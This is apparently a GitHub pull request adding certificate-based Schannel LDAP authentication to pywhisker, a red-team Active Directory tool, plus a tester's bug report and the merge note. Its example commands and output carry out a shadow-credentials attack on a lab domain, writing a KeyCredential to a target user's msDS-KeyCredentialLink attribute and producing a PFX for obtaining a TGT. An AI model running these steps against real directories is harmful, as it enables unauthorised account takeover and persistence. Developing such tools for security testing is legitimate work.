Added support to use PassTheCert #24

Merged (3 commits) on Nov 17, 2024


JPG0mez commented Oct 29, 2024

Initial PR for adding PassTheCert support to pywhisker.

This will take in a crt and key file extracted from a pfx using Certipy. It lets the user auth using Schannel via LDAP with the certificate and key.

Ex:

jp@sprocket ~> pywhisker -d thegrid.com --dc-ip 192.168.0.180 --use-schannel -crt admin.crt -key admin.key -t kflynn -a list
[*] Searching for the target account
[*] Target user found: CN=Kevin Flynn,CN=Users,DC=thegrid,DC=com
[*] Attribute msDS-KeyCredentialLink is either empty or user does not have read permissions on that attribute

jp@sprocket ~> pywhisker -d thegrid.com --dc-ip 192.168.0.180 --use-schannel -crt admin.crt -key admin.key -t kflynn -a add
[*] Searching for the target account
[*] Target user found: CN=Kevin Flynn,CN=Users,DC=thegrid,DC=com
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 1e22caec-4696-5c0a-8de4-6566fd89dea3
[*] Updating the msDS-KeyCredentialLink attribute of kflynn
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: JUuz6p3L.pfx
[*] Must be used with password: sWBNBeZM2X5XNHczUFJn
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

jp@sprocket ~> pywhisker -d thegrid.com --dc-ip 192.168.0.180 --use-schannel -crt admin.crt -key admin.key -t kflynn -a list
[*] Searching for the target account
[*] Target user found: CN=Kevin Flynn,CN=Users,DC=thegrid,DC=com
[*] Listing devices for kflynn
[*] DeviceID: 1e22caec-4696-5c0a-8de4-6566fd89dea3 | Creation Time (UTC): 2024-10-29 17:28:07.373425

Note: This commit includes an existing PR by KillingTree.
"Logger" is still misconfigured for the function "ldap3_kerberos_login".

seliatis commented Nov 7, 2024

@ShutdownRepo As discussed yesterday, I tested on a box that has just been released. The PR works; I cloned its repo. Just a bug with the version of pyOpenSSL, which I had to upgrade to version 22.1.0 because otherwise I'd get this error:

[!] module ‘OpenSSL.crypto’ has no attribute ‘PKCS12’

as in issue #17

ShutdownRepo (Owner) commented

Merging this one as it's been tested and confirmed, and includes #22
Thank you all for the contribution!

ShutdownRepo merged commit b0d8e46 into ShutdownRepo:main on Nov 17, 2024
1 check passed